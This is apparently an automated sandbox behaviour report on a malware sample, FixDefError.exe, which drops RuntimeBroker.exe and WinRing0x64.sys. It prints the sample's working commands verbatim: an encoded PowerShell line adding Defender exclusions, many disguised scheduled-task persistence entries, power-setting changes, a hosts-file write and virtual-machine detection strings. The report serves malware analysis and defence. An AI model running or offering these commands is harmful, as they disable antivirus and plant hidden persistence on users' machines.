      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\FixDefError.exe TID: 5892Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 5932Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 6068Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe TID: 5948Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4108Thread sleep count: 9137 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep time: -922337203685477s >= -30000s
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe TID: 3988Thread sleep time: -42200s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sysJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDropped PE file which has not been started: C:\ProgramData\RuntimeBrokerData\svhost.exeJump to dropped file
      Source: C:\Users\user\Desktop\FixDefError.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9137
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\FixDefError.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeThread delayed: delay time: 30000
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmwaretrat
      Source: ProgramStarter.exe, 00000001.00000002.349772100.0000000009B3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
      Source: powershell.exe, 00000004.00000003.465541531.000000000535F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
      Source: ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxtray
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxservice
      Source: ProgramStarter.exe, 00000001.00000002.349772100.0000000009B3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareM3X57C89Win32_VideoControllerL7AUS5NSVideoController120060621000000.000000-0007926944.display.infMSBDAV33ZTS67PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsEWREGOHN99
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmware
      Source: powershell.exe, 00000004.00000003.465541531.000000000535F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmtoolsd
      Source: svchost.exe, 00000024.00000002.515586506.0000023C61E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmwareuser
      Source: svchost.exe, 00000024.00000002.516433522.0000023C61E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.516467984.000001EA20466000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.516600617.0000025B84229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\FixDefError.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Modifies the hosts file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Encrypted powershell cmdline option found
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#sUBvVIGpEJm#> Add-MpPreference <#kcITYcpBGLV#> -ExclusionPath <#jtGdzQcTEMOleJVpwil#> @( <#FoLTGYsFqsriYy#> $env:UserProfile, <#pKPevFFlRNiZEPXKhNI#> $env:ProgramData) <#QUBJyveKFT#> -Force <#IqcWqGFjRcMEhYsub#>
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#sUBvVIGpEJm#> Add-MpPreference <#kcITYcpBGLV#> -ExclusionPath <#jtGdzQcTEMOleJVpwil#> @( <#FoLTGYsFqsriYy#> $env:UserProfile, <#pKPevFFlRNiZEPXKhNI#> $env:ProgramData) <#QUBJyveKFT#> -Force <#IqcWqGFjRcMEhYsub#>
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & schtasks /create /sc minute /mo 5 /tn "activationrule" /tr "c:\programdata\runtimebrokerdata\runtimebroker.exe" /rl highest /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /c powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & schtasks /create /sc minute /mo 5 /tn "activationrule" /tr "c:\programdata\runtimebrokerdata\runtimebroker.exe" /rl highest /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajahmavqbcahyavgbjaecacabfaeoabqajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagsaywbjafqawqbjahaaqgbhaewavgajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmaagb0aecazab6afeaywbuaeuatqbpagwazqbkafyacab3agkabaajad4aiabaacgaiaa8acmargbvaewavabhafkacwbgaheacwbyagkawqb5acmapgagacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaagadwaiwbwaesauablahyargbgagwaugboagkawgbfafaawablaggatgbjacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeqayqb0ageakqagadwaiwbrafuaqgbkahkadgblaesargbuacmapgagac0argbvahiaywblacaapaajaekacqbjafcacqbhaeyaagbsagmatqbfaggawqbzahuaygajad4a"
      Source: C:\Users\user\Desktop\FixDefError.exeProcess created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Users\user\Desktop\FixDefError.exe VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
